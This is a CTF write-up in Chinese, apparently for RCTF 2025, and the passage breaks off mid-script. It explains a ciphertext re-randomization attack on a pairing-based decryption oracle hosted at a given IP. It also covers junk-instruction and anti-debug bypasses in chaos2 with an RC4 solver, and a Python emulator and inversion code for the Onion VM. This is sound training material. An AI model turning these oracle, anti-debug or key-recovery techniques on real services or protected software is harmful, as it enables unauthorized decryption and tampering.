- 题目背景: 这个挑战是个基于 BLS12‑381 配对的公钥加密 oracle。服务端生成 (c1, c2, c3) 密文,并把 shared_key = pairing(…) 经过 kdf 作为 XOR 密钥加密 flag。服务器会把 banner 发过来里面包括密文和加密 flag,同时接受你发来的 (c1’, c2’, c3’),解密后返回同一个 kdf(shared_key)。
- 攻击思路: 该方案是可重随机化的。已知原密文 (c1, c2, c3):
- 选随机标量 r。
- c2’ = c2 + G1·r,c3’ = c3 + h1(id)·r,c1’ = c1 · pk^r。 这三个量依然是合法密文,解出来的 shared_key 与原来一样。你把 (c1’, c2’, c3’) 发给 oracle,它会返回原始的 kdf(shared_key);再和 banner 中的加密 flag 做 XOR 就能还原 flag。
- 实现细节:
- client/src/main.rs 用的是跟服务端一致的 common crate,复用 parse_gt/parse_g1/parse_g2、hex_gt/hex_g1/hex_g2,不会出序列化不一致的问题。
- 程序连接 1.14.196.78 (line 42601),读取 banner,解析出 pk、h1(id)、原密文与加密 flag;用 Fr::rand 生成 r,做上面三步变换,发回新的密文;然后读回 key,并用 xor(&mut enc_flag, &key) 还原明文 flag。
- 目前仓库还带有一些 Python 脚本(run_solve_once.py、solve.py 等)作为探索辅助,但正解是 Rust 客户端。
让ai改完代码下载好rust后,运行cargo run -p client即可得到flag

Reverse
Chaos
出糊了变成签到,运行程序即给flag

flag:RCTF{AntiDbg_KeyM0d_2025_R3v3rs3}
chaos2
Chaos的revenge版本,看到如下花指令类型
.text:004014E3 jnz short near ptr loc_4014E5+2
.text:004014E5
.text:004014E5 loc_4014E5: ; CODE XREF: .text:004014E3↑j
.text:004014E5 jmp near ptr 40FDD7h
.text:004014E5 ; ---------------------------------------------------------------------------
.text:004014EA align 4
.text:004014EC pop eax
.text:004014ED mov [ebp-88h], eax
.text:004014F3 call loc_4014FB
.text:004014F3 ; ---------------------------------------------------------------------------
.text:004014F8 db 0EAh, 0EBh, 9
.text:004014FB ; ---------------------------------------------------------------------------
.text:004014FB
.text:004014FB loc_4014FB: ; CODE XREF: .text:004014F3↑j
.text:004014FB pop ebx
.text:004014FC inc ebx
.text:004014FD push ebx
.text:004014FE mov eax, 11111111h
.text:00401503 retn
.text:00401504 ; ---------------------------------------------------------------------------
.text:00401504 call sub_401510
.text:00401509 mov ebx, 33333333h
.text:0040150E jmp short loc_40151D
.text:00401510
.text:00401510 ; =============== S U B R O U T I N E =======================================
.text:00401510
.text:00401510
.text:00401510 sub_401510 proc near ; CODE XREF: .text:00401504↑p
.text:00401510 mov ebx, 11111111h
.text:00401515 pop ebx
.text:00401516 mov ebx, offset loc_40151D
.text:0040151B push ebx
.text:0040151C retn
.text:0040151C sub_401510 endp
.text:0040151C
.text:0040151D ; ---------------------------------------------------------------------------
.text:0040151D
.text:0040151D loc_40151D: ; CODE XREF: .text:0040150E↑j
.text:0040151D ; DATA XREF: sub_401510+6↑o
.text:0040151D mov ebx, 22222222h
全nop即可
加密算法是rc4
char __cdecl sub_4017D0(_BYTE *a1, char *a2, unsigned int n128)
{
char result; // al
char v4; // [esp+0h] [ebp-10h]
int v5; // [esp+4h] [ebp-Ch]
int v6; // [esp+8h] [ebp-8h]
unsigned int n0x100; // [esp+Ch] [ebp-4h]
unsigned int n0x100_1; // [esp+Ch] [ebp-4h]
v5 = 0;
LOBYTE(v6) = 0;
result = (char)a1;
a1[257] = 0;
a1[256] = 0;
for ( n0x100 = 0; n0x100 < 0x100; ++n0x100 )
{
result = n0x100 + (_BYTE)a1;
a1[n0x100] = n0x100;
}
for ( n0x100_1 = 0; n0x100_1 < 0x100; ++n0x100_1 )
{
v4 = a1[n0x100_1];
v6 = (unsigned __int8)(v6 + v4 + a2[v5]);
a1[n0x100_1] = a1[(unsigned __int8)v6];
result = v4;
a1[v6] = v4;
if ( ++v5 >= n128 )
v5 = 0;
}
return result;
}
char __cdecl sub_4018A0(_BYTE *a1, char *a2, int n128)
{
char result; // al
char v5; // [esp+4h] [ebp-14h]
char v6; // [esp+8h] [ebp-10h]
int v7; // [esp+Ch] [ebp-Ch]
int v8; // [esp+10h] [ebp-8h]
LOBYTE(v8) = a1[256];
LOBYTE(v7) = a1[257];
while ( n128-- )
{
v8 = (unsigned __int8)(v8 + 1);
v6 = a1[v8];
v7 = (unsigned __int8)(v6 + v7);
v5 = a1[v7];
a1[v8] = v5;
a1[v7] = v6;
*a2++ ^= a1[(unsigned __int8)(v5 + v6)];
}
a1[256] = v8;
result = v7;
a1[257] = v7;
return result;
}
调试起来发现key是flag:{Th1sflaglsGo0ds}

尝试解密发现有问题,然后注意到几处反调试
int sub_A81090()
{
int v1; // [esp+Ch] [ebp-Ch]
uint8_t BeingDebugged; // [esp+13h] [ebp-5h]
BeingDebugged = NtCurrentPeb()->BeingDebugged;
sub_A81440();
n8 = 8;
if ( !BeingDebugged )
*(_BYTE *)(n8 + dword_A8440C) = 'i';
return v1;
}
int __cdecl sub_A81200(int (__stdcall *a1)(HANDLE, int, int *, int, _DWORD))
{
int result; // eax
HANDLE CurrentProcess; // [esp+Ch] [ebp-10h]
int v3; // [esp+14h] [ebp-8h] BYREF
CurrentProcess = GetCurrentProcess();
result = a1(CurrentProcess, 7, &v3, 4, 0);
n8 = 14;
if ( !v3 )
*(_BYTE *)(n8 + dword_A8440C) = 'I';
return result;
}
int __cdecl sub_A813A0(int (__stdcall *a1)(HANDLE, int, int *, int, _DWORD))
{
int result; // eax
HANDLE CurrentProcess; // [esp+Ch] [ebp-10h]
int v3; // [esp+14h] [ebp-8h] BYREF
CurrentProcess = GetCurrentProcess();
result = a1(CurrentProcess, 31, &v3, 4, 0);
n8 = 18;
if ( v3 == 1 )
*(_BYTE *)(n8 + dword_A8440C) = 'o';
return result;
}
所以调试起来获得的密钥是错误的,正确的密钥是flag:{ThisflagIsGoods},然后注意下长度是0x80,后面全空
exp如下:
cipher = [
15, 26, -118, 90, 34, -85, 30, 99, 25, 90, -121, -14, -26, -23, -41, -47, -105, -7, -8, 50, 91, -34, 45, -42, -93, 79, 126, -53, 97, -78, 63, -65, -73, 27, 10, -124, -77, -76, -34, 3, 70, 123, -125, -16, -60, -77, -85, 123, 41, -68, 31, -2, -118, 121, 38, -38, 8, 1, -123, 102, 125, -69, -18, 15, -119, 89, -44, 95, -84, 24, -82, 11, 78, -16, -73, 5, 92, -127, 4, -97, -92, 28, 93, -96, -71, 7, -110, 92, -118, 83, -13, -1, -9, -89, -35, 46, -26, -19, 15, 119, 44, 74, 34, -15, 54, 79, -89, -18, 13, -42, 4, 115, 85, 94, 62, -109, -92, 52, 41, 103, -4, 35, 121, 25, -40, -55, 43, -49
]
cipher = [(x + 256) & 0xff for x in cipher]
key = list(b"flag:{ThisflagIsGoods}")+[0]*(128-len(b"flag:{ThisflagIsGoods}"))
def rc4_init(key_bytes):
S = list(range(256))
j = 0
key_len = len(key_bytes)
for i in range(256):
j = (j + S[i] + key_bytes[i % key_len]) & 0xff
S[i], S[j] = S[j], S[i]
return S
def rc4_crypt(S, data):
i = 0
j = 0
out = []
for idx, b in enumerate(data):
i = (i + 1) & 0xff
Si = S[i]
j = (j + Si) & 0xff
Sj = S[j]
S[i], S[j] = Sj, Si
K = S[(Si + Sj) & 0xff]
out.append(b ^ K)
return bytes(out)
def main():
if len(key) != 0x80:
return
S = rc4_init(key)
plain = rc4_crypt(S, cipher)
print(plain)
try:
print("decoded:", plain.decode('utf-8', errors='ignore'))
except:
pass
if __name__ == "__main__":
main()
解得flag:RCTF{AntiDbg_Reversing_2025_v2.0_Ch4llenge}
Onion
非常复杂的vm,题目要求输入50行数字,最开始尝试左移、右移、异或这些常见运算指令下条件断点试图打印,结果发现看不出规律且调用非常多,无奈去同构VM,不得不说GPT5同构能力非常强,vm代码喂给它给了份python实现,稍微修改下加入log,对比动态调试的数据对的上就可以用了
import struct
MEM_SIZE = 0x10000
DATA_QWORD_BASE = 7168 # in qwords
DATA_BASE = DATA_QWORD_BASE * 8 # 0xE000
def u8(x): return x & 0xFF
def u16(x): return x & 0xFFFF
def u32(x): return x & 0xFFFFFFFF
def u64(x): return x & 0xFFFFFFFFFFFFFFFF
class VM:
def __init__(self, vmcode: bytes, input_ints=None, debug_after_n=None):
self.mem = bytearray(MEM_SIZE)
if len(vmcode) > DATA_BASE:
raise ValueError("vmcode too large")
self.mem[:len(vmcode)] = vmcode
# VM 状态
self.regs = [0] * 8 # s[0..7]
self.ip = 0 # 低 16 位:指令指针
self.dp = 0xFFFF # 高 16 位:数据/栈指针
self.base0 = 0 # LOWORD(v92)
self.base1 = 0 # WORD1(v92)
self.base2 = 0 # WORD2(v92)
self.zf = False # BYTE6(v92) —— 零标志
self.run_flag = True # HIBYTE(v92) —— 是否继续跑
self.output = None # 0x84 时记一下输出值
self.debug_ok = False
self.num = 0
self.debug_after_n = debug_after_n
# 输入整数写到内存后段
if input_ints is not None:
for idx, val in enumerate(input_ints):
if idx >= 50:
break
off = DATA_BASE + idx * 8
struct.pack_into("<Q", self.mem, off, u64(val))
# 内存读写辅助
def read_u8(self, addr):
addr &= 0xFFFF
return self.mem[addr]
def read_u16(self, addr):
addr &= 0xFFFF
if addr == 0xFFFF:
return self.mem[addr]
return self.mem[addr] | (self.mem[(addr + 1) & 0xFFFF] << 8)
def write_u8(self, addr, val):
addr &= 0xFFFF
self.mem[addr] = u8(val)
def read_u64(self, addr):
addr &= 0xFFFF
bs = bytes(self.mem[addr:addr+8] + self.mem[:max(0, addr+8-MEM_SIZE)])
return struct.unpack_from("<Q", bs, 0)[0]
def write_u64(self, addr, val):
addr &= 0xFFFF
b = struct.pack("<Q", u64(val))
for i in range(8):
self.mem[(addr + i) & 0xFFFF] = b[i]
def fetch_u8(self):
b = self.read_u8(self.ip)
self.ip = u16(self.ip + 1)
return b
def fetch_u16(self):
lo = self.read_u8(self.ip)
hi = self.read_u8(self.ip + 1)
self.ip = u16(self.ip + 2)
return (hi << 8) | lo
def step(self, debug=False):
ip0 = self.ip
opcode = self.fetch_u8()
# 方便统一前缀:显示 IP / opcode
def log(msg):
if (debug or self.debug_ok) and self.num >= self.debug_after_n-1:
print(f"[IP={ip0:04x} OP={opcode:02x}] {msg}")
# 0x00: NOP
if opcode == 0x00:
log("NOP")
return
# 0x01: JMP imm16
elif opcode == 0x01:
imm = self.fetch_u16()
log(f"JMP 0x{imm:04x}")
self.ip = imm
# 0x02: JNZ imm16 (推测:ZF==0 时跳转)
elif opcode == 0x02:
imm = self.fetch_u16()
log(f"JNZ 0x{imm:04x}, ZF={self.zf}")
if not self.zf:
self.ip = imm
# 0x03: JZ imm16 (推测:ZF==1 时跳转)
elif opcode == 0x03:
imm = self.fetch_u16()
log(f"JZ 0x{imm:04x}, ZF={self.zf}")
if self.zf:
self.ip = imm
# 0x11: 设置 base0(LOWORD(v92))
elif opcode == 0x11:
imm = self.fetch_u16()
log(f"SET base0 = 0x{imm:04x}")
self.base0 = imm
# 0x12: 设置 base1(WORD1(v92))
elif opcode == 0x12:
imm = self.fetch_u16()
log(f"SET base1 = 0x{imm:04x}")
self.base1 = imm
# 0x15: R[reg] = QWORD[mem[base0]]
elif opcode == 0x15:
reg = self.fetch_u8()
if reg >= 8:
raise IndexError("reg out of range in 0x15")
val = self.read_u64(self.base0)
log(f"LDQ R{reg} = [0x{self.base0:04x}] => 0x{val:016x}")
self.regs[reg] = val
# 0x16: R[reg] = imm64
elif opcode == 0x16:
reg = self.fetch_u8()
if reg >= 8:
raise IndexError("reg out of range in 0x16")
b = bytes(self.mem[self.ip:self.ip+8] +
self.mem[:max(0, self.ip+8-MEM_SIZE)])
imm = struct.unpack_from("<Q", b, 0)[0]
self.ip = u16(self.ip + 8)
self.regs[reg] = imm
self.zf = (imm == 0)
log(f"LDI R{reg} = 0x{imm:016x}, ZF={self.zf}")
# 0x17: R[dst] = R[src]
elif opcode == 0x17:
dst = self.fetch_u8()
src = self.fetch_u8()
if dst >= 8 or src >= 8:
raise IndexError("reg out of range in 0x17")
self.regs[dst] = self.regs[src]
self.zf = (self.regs[dst] == 0)
log(f"MOV R{dst} = R{src} (0x{self.regs[dst]:016x}), ZF={self.zf}")
# 0x18: R[reg] = QWORD[mem[base0 + offset16]]
elif opcode == 0x18:
reg = self.fetch_u8()
off = self.fetch_u16()
if reg >= 8:
raise IndexError("reg out of range in 0x18")
addr = u16(self.base0 + off)
val = self.read_u64(addr)
self.regs[reg] = val
# if reg == 0:
# self.debug_ok = True
log(f"LDQ R{reg} = [base0 + 0x{off:04x}] @0x{addr:04x} => 0x{val:016x}")
# 0x19: QWORD[mem[base0]] = R[reg]
elif opcode == 0x19:
reg = self.fetch_u8()
if reg >= 8:
raise IndexError("reg out of range in 0x19")
self.write_u64(self.base0, self.regs[reg])
log(f"STQ [0x{self.base0:04x}] = R{reg} (0x{self.regs[reg]:016x})")
# 0x1A: R[dst] = byte[mem[base0 + (u16)R[src]]]
elif opcode == 0x1A:
dst = self.fetch_u8()
src = self.fetch_u8()
if dst >= 8 or src >= 8:
raise IndexError("reg out of range in 0x1A")
idx = u16(self.regs[src])
addr = u16(self.base0 + idx)
val = self.read_u8(addr)
self.regs[dst] = val
log(f"LDB R{dst} = [base0 + (u16)R{src}] @0x{addr:04x} => 0x{val:02x}")
# 0x1B: byte[mem[base0 + (u16)R[src]]] = (u8)R[dst]
elif opcode == 0x1B:
dst = self.fetch_u8()
src = self.fetch_u8()
if dst >= 8 or src >= 8:
raise IndexError("reg out of range in 0x1B")
idx = u16(self.regs[src])
addr = u16(self.base0 + idx)
val = u8(self.regs[dst])
self.write_u8(addr, val)
log(f"STB [base0 + (u16)R{src}] @0x{addr:04x} = R{dst}.lo (0x{val:02x})")
# 0x1C: R[reg]++ ; ZF = (old == -1)
elif opcode == 0x1C:
reg = self.fetch_u8()
if reg >= 8:
raise IndexError("reg out of range in 0x1C")
old = self.regs[reg]
self.regs[reg] = u64(old + 1)
self.zf = (old == 0xFFFFFFFFFFFFFFFF)
log(f"INC R{reg}: 0x{old:016x} -> 0x{self.regs[reg]:016x}, ZF={self.zf}")
# 0x1D: R[reg]-- ; ZF = (old == 1)
elif opcode == 0x1D:
reg = self.fetch_u8()
if reg >= 8:
raise IndexError("reg out of range in 0x1D")
old = self.regs[reg]
self.regs[reg] = u64(old - 1)
self.zf = (old == 1)
log(f"DEC R{reg}: 0x{old:016x} -> 0x{self.regs[reg]:016x}, ZF={self.zf}")
# 0x1E: R[reg] >>= shift8 ; ZF = (result == 0)
elif opcode == 0x1E:
reg = self.fetch_u8()
shift = self.fetch_u8()
if reg >= 8:
raise IndexError("reg out of range in 0x1E")
val = self.regs[reg]
res = u64(val >> (shift & 0x3F))
self.regs[reg] = res
self.zf = (res == 0)
log(f"SHR R{reg} >>= {shift & 0x3F}: 0x{val:016x} -> 0x{res:016x}, ZF={self.zf}")
# 0x1F: base0 += (u16)R[reg]
elif opcode == 0x1F:
reg = self.fetch_u8()
if reg >= 8:
raise IndexError("reg out of range in 0x1F")
old = self.base0
self.base0 = u16(self.base0 + u16(self.regs[reg]))
log(f"ADD base0 += (u16)R{reg}: 0x{old:04x} -> 0x{self.base0:04x}")
# 0x25: AND 寄存器
elif opcode == 0x25:
dst = self.fetch_u8()
src = self.fetch_u8()
if dst >= 8 or src >= 8:
raise IndexError("reg out of range in 0x25")
old = self.regs[dst]
self.regs[dst] = u64(old & self.regs[src])
self.zf = (self.regs[dst] == 0)
log(f"AND R{dst} &= R{src}: 0x{old:016x} & 0x{self.regs[src]:016x} = 0x{self.regs[dst]:016x}, ZF={self.zf}")
# 0x26: XOR 寄存器
elif opcode == 0x26:
dst = self.fetch_u8()
src = self.fetch_u8()
if dst >= 8 or src >= 8:
raise IndexError("reg out of range in 0x26")
old = self.regs[dst]
self.regs[dst] = u64(old ^ self.regs[src])
self.zf = (self.regs[dst] == old) # 等价于 src == 0
log(f"XOR R{dst} ^= R{src}: 0x{old:016x} ^ 0x{self.regs[src]:016x} = 0x{self.regs[dst]:016x}, ZF={self.zf}")
# 0x27: R[reg] <<= shift8 ; ZF = (result == 0)
elif opcode == 0x27:
reg = self.fetch_u8()
shift = self.fetch_u8()
if reg >= 8:
raise IndexError("reg out of range in 0x27")
val = self.regs[reg]
res = u64(val << (shift & 0x3F))
self.regs[reg] = res
self.zf = (res == 0)
log(f"SHL R{reg} <<= {shift & 0x3F}: 0x{val:016x} -> 0x{res:016x}, ZF={self.zf}")
# 0x29: R[reg] ^= imm64 ; ZF = (old == imm)
elif opcode == 0x29:
reg = self.fetch_u8()
if reg >= 8:
raise IndexError("reg out of range in 0x29")
b = bytes(self.mem[self.ip:self.ip+8] +
self.mem[:max(0, self.ip+8-MEM_SIZE)])
imm = struct.unpack_from("<Q", b, 0)[0]
self.ip = u16(self.ip + 8)
old = self.regs[reg]
self.regs[reg] = u64(old ^ imm)
self.zf = (old == imm)
log(f"XOR R{reg} ^= imm64 0x{imm:016x}: 0x{old:016x} -> 0x{self.regs[reg]:016x}, ZF={self.zf}")
# 0x2A: R[reg] &= imm64 ; ZF = (result == 0)
elif opcode == 0x2A:
reg = self.fetch_u8()
if reg >= 8:
raise IndexError("reg out of range in 0x2A")
b = bytes(self.mem[self.ip:self.ip+8] +
self.mem[:max(0, self.ip+8-MEM_SIZE)])
imm = struct.unpack_from("<Q", b, 0)[0]
self.ip = u16(self.ip + 8)
old = self.regs[reg]
self.regs[reg] = u64(old & imm)
self.zf = (self.regs[reg] == 0)
log(f"AND R{reg} &= imm64 0x{imm:016x}: 0x{old:016x} -> 0x{self.regs[reg]:016x}, ZF={self.zf}")
# 0x2B: R[dst] = byte[mem[base1 + (u16)R[src]]]
elif opcode == 0x2B:
dst = self.fetch_u8()
src = self.fetch_u8()
if dst >= 8 or src >= 8:
raise IndexError("reg out of range in 0x2B")
idx = u16(self.regs[src])
addr = u16(self.base1 + idx)
val = self.read_u8(addr)
self.regs[dst] = val
log(f"LDB R{dst} = [base1 + (u16)R{src}] @0x{addr:04x} => 0x{val:02x}")
# 0x2C: byte[mem[base1 + (u16)R[src]]] = (u8)R[dst]
elif opcode == 0x2C:
dst = self.fetch_u8()
src = self.fetch_u8()
if dst >= 8 or src >= 8:
raise IndexError("reg out of range in 0x2C")
idx = u16(self.regs[src])
addr = u16(self.base1 + idx)
val = u8(self.regs[dst])
self.write_u8(addr, val)
log(f"STB [base1 + (u16)R{src}] @0x{addr:04x} = R{dst}.lo (0x{val:02x})")
# 0x32: ZF = (R[reg] == imm64)
elif opcode == 0x32:
reg = self.fetch_u8()
if reg >= 8:
raise IndexError("reg out of range in 0x32")
b = bytes(self.mem[self.ip:self.ip+8] +
self.mem[:max(0, self.ip+8-MEM_SIZE)])
imm = struct.unpack_from("<Q", b, 0)[0]
self.ip = u16(self.ip + 8)
self.zf = (self.regs[reg] == imm)
log(f"CMP R{reg} == 0x{imm:016x}? R{reg}=0x{self.regs[reg]:016x}, ZF={self.zf}")
# if reg == 0:
# self.zf = True
# self.debug_ok = False
# self.num += 1
# 0x80: 把当前 ip 记到 base2,作为“函数起点”
elif opcode == 0x80:
self.base2 = self.ip
log(f"SET base2 = ip = 0x{self.ip:04x}")
# 0x81: 注册函数:table[idx] = base2 + 3
elif opcode == 0x81:
idx = self.fetch_u8()
if not hasattr(self, "fun_table"):
self.fun_table = {}
self.fun_table[idx] = u16(self.base2 + 3)
log(f"DEF FN[{idx}] = 0x{self.fun_table[idx]:04x}")
# 0x82: call 函数:压栈返回地址,再跳转
elif opcode == 0x82:
idx = self.fetch_u8()
if not hasattr(self, "fun_table") or idx not in self.fun_table:
raise KeyError(f"function idx {idx} not registered")
ret = self.ip
self.dp = u16(self.dp - 2)
self.write_u8(self.dp, ret & 0xFF)
self.write_u8(self.dp + 1, (ret >> 8) & 0xFF)
self.ip = self.fun_table[idx]
log(f"CALL FN[{idx}] -> 0x{self.ip:04x}, push RET=0x{ret:04x} at dp=0x{self.dp:04x}")
# 0x83: ret:从栈顶弹出返回地址到 ip
elif opcode == 0x83:
if self.dp == 0xFFFF:
log("RET with empty stack -> halt")
self.run_flag = False
return
lo = self.read_u8(self.dp)
hi = self.read_u8(self.dp + 1)
ret = (hi << 8) | lo
self.dp = u16(self.dp + 2)
log(f"RET to 0x{ret:04x}, new dp=0x{self.dp:04x}")
self.ip = ret
# 0x84: 输出 R[reg](写到栈上),然后退出 VM
elif opcode == 0x84:
reg = self.fetch_u8()
if reg >= 8:
raise IndexError("reg out of range in 0x84")
self.dp = u16(self.dp - 8)
self.write_u64(self.dp, self.regs[reg])
self.output = self.regs[reg]
log(f"RETVAL R{reg} = 0x{self.regs[reg]:016x} stored at dp=0x{self.dp:04x}, HALT")
# self.run_flag = False
# 0x85: R[reg] = QWORD[mem[dp]] ; dp += 8
elif opcode == 0x85:
reg = self.fetch_u8()
if reg >= 8:
raise IndexError("reg out of range in 0x85")
val = self.read_u64(self.dp)
self.regs[reg] = val
self.dp = u16(self.dp + 8)
log(f"POPQ R{reg} = [dp] => 0x{val:016x}, new dp=0x{self.dp:04x}")
# 0x90: 系统调用(这里还没实现)
elif opcode == 0x90:
arg = self.fetch_u8()
log(f"SYSCALL 0x90 arg=0x{arg:02x} (NOT IMPLEMENTED) -> HALT")
# self.run_flag = False
else:
log(f"UNKNOWN opcode -> HALT")
self.run_flag = False
def run(self, debug=False):
steps = 0
while self.run_flag:
self.step(debug=debug)
steps += 1
return self.output
def run_vm_with_ints(ints, vmcode_path="full_vmcode", debug=False):
with open(vmcode_path, "rb") as f:
code = f.read()
vm = VM(code, input_ints=ints, debug_after_n=0)
out = vm.run(debug=debug)
return out, vm
if __name__ == "__main__":
ints = [1633771873, 13767982679358783948, 11713643540287541804, 1684300900, 1701143909, 1717986918, 1734829927, 1751672936, 14773488025708418042, 1785358954, 1802201963, 1819044972, 1835887981, 1852730990, 1869573999, 1886417008, 1903260017, 3919366872831373201, 11451939409513851430, 1953789044, 17235855896972825888, 1987475062, 2004318071, 2021161080, 2038004089, 2054847098, 1094795585, 1111638594, 1128481603, 5295387722887053174, 15356410353063384153, 12187465423418120720, 1195853639, 1212696648, 1229539657, 1246382666, 1263225675, 1280068684, 1296911693, 1313754702, 1330597711, 1347440720, 1364283729, 1381126738, 1397969747, 1414812756, 1431655765, 1448498774, 11625777768394830813, 1482184792]
ints = 1633771873,1650614882,1667457891,1684300900,1701143909,1717986918,1734829927,1751672936,1768515945,1785358954,1802201963,1819044972,1835887981,1852730990,1869573999,1886417008,1903260017,1920103026,1936946035,1953789044,1970632053,1987475062,2004318071,2021161080,2038004089,2054847098,1094795585,1111638594,1128481603,1145324612,1162167621,1179010630,1195853639,1212696648,1229539657,1246382666,1263225675,1280068684,1296911693,1313754702,1330597711,1347440720,1364283729,1381126738,1397969747,1414812756,1431655765,1448498774,1465341783,1482184792,1499027801,1515870810
out, vm = run_vm_with_ints(ints, vmcode_path="full_vmcode", debug=True)
if out is None:
print("VM finished without explicit 0x84 output")
else:
print(f"VM output: {out} (0x{out:016x})")
上面可以完整的打印所有流程,输入ints我最开始构造的是aaaa、bbbb等ascii_letters[:50],最开始可以把log注释全部取消,debug参数改为True可以看到完整流程
观察到第一组数据读出了0x63636363,也就是第三个数,然后会运行到opcode为0x90的地方,可以发现打印Fail前面正好有一处cmp比较了数值,测试发现第一个数是固定的,第二个是我们输入的数字经过加密得到的


我们可以简化下代码,实际上可以只看数字读取开始到cmp比较中间的运算代码,jmp类log、数据读取类均可以注释掉,方便我们分析运算代码(具体修改是把debug改为False、opcode 0x18那里增加reg==0时候设置debug_ok开始打印日志),此时一轮check日志可以缩减为2000行左右了,可以把一轮的日志喂给各种ai让他们各显神通
最后抽象整理出了几个函数,在之后的几轮check发现都用到了
def loop_64bit(r0, r6):
while True:
r7 = r0
r7 = (r7 & r6) & mask64
r0 = (r0 ^ r6) & mask64
if r7 == 0:
break
r7 = (r7 << 1) & mask64
r6 = r7
return r0
def build_r2_schedule():
"""
r2,r3,r4,r5 的更新和 r0,r1 无关,所以可以单独跑出每一轮的 r2_k。
返回长度为 27 的数组 R2[k] = 第 k 轮使用的 r2。
"""
r2 = 0x6df9f721
r3 = 0x8d85b315
r4 = 0x40bc0884
r5 = 0x28e3d333
R2 = []
for k in range(27): # k = 0..0x1a
R2.append(r2)
if k == 0x1a:
# 最后一轮只跑上半轮,不再更新 r2,r3,r4,r5
continue
# 下半轮:只影响 r2,r3,r4,r5,不涉及数据 r0,r1
r0_g_in = r3
r1_g_in = r2
r2_g_in = k
r0_H_A = func_A_32bit(r0_g_in)
r0_H_B = func_B_32bit(r0_H_A, r1_g_in)
r0_H_C = func_C_32bit(r0_H_B, r2_g_in)
r1_H_D = func_D_32bit(r1_g_in)
r1_H_E = func_E_32bit(r0_H_C, r1_H_D)
# 更新到下一轮的 r2,r3,r4,r5
r2, r3, r4, r5 = r1_H_E, r4, r5, r0_H_C
return R2
def rol32(x, n):
return ((x << n) | (x >> (32 - n))) & mask32
def ror32(x, n):
return ((x >> n) | (x << (32 - n))) & mask32
def inv_upper_round(r0_next, r1_next, r2_k):
"""
逆向一轮上半轮:
输入:本轮输出的 (r0_next, r1_next) 以及该轮使用的 r2_k
输出:本轮输入的 (r0_prev, r1_prev)
"""
c0 = r0_next & mask32
e1 = r1_next & mask32
d1 = (e1 ^ c0) & mask32
r1_prev = ror32(d1, 3) # 逆 D: ROL3 -> ROR3
b0 = (c0 ^ r2_k) & mask32 # 逆 C: XOR r2
a0 = (b0 - r1_prev) & mask32 # 逆 B: 减去 r1_prev
r0_prev = rol32(a0, 8) # 逆 A: ROR8 -> ROL8
return r0_prev, r1_prev
其中比较重要的是loop_64bit和build_r2_schedule,都传入了常量,但是发现顺序有所不同
这里列下check2和check3,需要注意在前一个check不过的情况下无法打印下一组的check日志,貌似前后有些依赖,第二轮的cmp值我并没有在vmcode里搜索到
check2的解密如下
mask64 = 0xFFFFFFFFFFFFFFFF
mask32 = 0xFFFFFFFF
def func_A_32bit(r_in):
r6 = r_in & mask32
r7 = r_in & mask32
r6 = (r6 >> 8) & mask32
r7 = (r7 << 24) & mask32
r6 = (r6 ^ r7) & mask32
return r6 & mask32
def func_B_32bit(r0, r1):
r6 = r1 & mask32
r0 &= mask32
while True:
r7 = r0
r7 = (r7 & r6) & mask32
r0 = (r0 ^ r6) & mask32
if r7 == 0:
break
r7 = (r7 << 1) & mask32
r6 = r7
return r0 & mask32
def func_C_32bit(r0, r2):
return (r0 ^ r2) & mask32
def func_D_32bit(r_in):
r6 = r_in & mask32
r7 = r_in & mask32
r6 = (r6 << 3) & mask32
r7 = (r7 >> 29) & mask32
r6 = (r6 ^ r7) & mask32
return r6 & mask32
def func_E_32bit(r0, r1):
return (r1 ^ r0) & mask32
def loop_64bit(r0, r6):
while True:
r7 = r0
r7 = (r7 & r6) & mask64
r0 = (r0 ^ r6) & mask64
if r7 == 0:
break
r7 = (r7 << 1) & mask64
r6 = r7
return r0
def build_r2_schedule():
"""
r2,r3,r4,r5 的更新和 r0,r1 无关,所以可以单独跑出每一轮的 r2_k。
返回长度为 27 的数组 R2[k] = 第 k 轮使用的 r2。
"""
r2 = 0x6df9f721
r3 = 0x8d85b315
r4 = 0x40bc0884
r5 = 0x28e3d333
R2 = []
for k in range(27): # k = 0..0x1a
R2.append(r2)
if k == 0x1a:
# 最后一轮只跑上半轮,不再更新 r2,r3,r4,r5
continue
# 下半轮:只影响 r2,r3,r4,r5,不涉及数据 r0,r1
r0_g_in = r3
r1_g_in = r2
r2_g_in = k
r0_H_A = func_A_32bit(r0_g_in)
r0_H_B = func_B_32bit(r0_H_A, r1_g_in)
r0_H_C = func_C_32bit(r0_H_B, r2_g_in)
r1_H_D = func_D_32bit(r1_g_in)
r1_H_E = func_E_32bit(r0_H_C, r1_H_D)
# 更新到下一轮的 r2,r3,r4,r5
r2, r3, r4, r5 = r1_H_E, r4, r5, r0_H_C
return R2
def rol32(x, n):
return ((x << n) | (x >> (32 - n))) & mask32
def ror32(x, n):
return ((x >> n) | (x << (32 - n))) & mask32
def inv_upper_round(r0_next, r1_next, r2_k):
"""
逆向一轮上半轮:
输入:本轮输出的 (r0_next, r1_next) 以及该轮使用的 r2_k
输出:本轮输入的 (r0_prev, r1_prev)
"""
c0 = r0_next & mask32
e1 = r1_next & mask32
d1 = (e1 ^ c0) & mask32
r1_prev = ror32(d1, 3) # 逆 D: ROL3 -> ROR3
b0 = (c0 ^ r2_k) & mask32 # 逆 C: XOR r2
a0 = (b0 - r1_prev) & mask32 # 逆 B: 减去 r1_prev
r0_prev = rol32(a0, 8) # 逆 A: ROR8 -> ROL8
return r0_prev, r1_prev
def decrypt_from_trace(cipher):
# 阶段 9 逆:拆 64 位
final_r0 = cipher & mask32
final_r1 = (cipher >> 32) & mask32
# 阶段 8 逆:利用 r2 调度,逆 27 轮上半轮
R2 = build_r2_schedule()
r0_curr, r1_curr = final_r0, final_r1
for k in reversed(range(27)): # 26,25,...,0
r2_k = R2[k]
r0_prev, r1_prev = inv_upper_round(r0_curr, r1_curr, r2_k)
r0_curr, r1_curr = r0_prev, r1_prev
r0_0, r1_0 = r0_curr, r1_curr
# 阶段 6 逆:拼回 64 位,去掉 XOR c4
v = ((r1_0 & mask32) << 32) | (r0_0 & mask32)
x = (v ^ 0x99d88c4fa4cc68aa) & mask64
# 逆向减回四个加法
x = (x - 0x58e8abfc7618f5fd) & mask64
x = (x - 0xf8a82a8dbdb78c3f) & mask64
x = (x - 0x11a8bb1017e16849) & mask64
x = (x - 0x7209f8c2f24400f7) & mask64
# 逆向 XOR 初始三常量
x ^= 0x311e18c91413b58c
x ^= 0x4303f92241dd9a9f
x ^= 0x95714c91bc8b306f
x &= mask64
return x
# -----------------------
# 自测:expected_output -> input_val
# -----------------------
if __name__ == "__main__":
expected_output = 0x659391a5dc3522b3
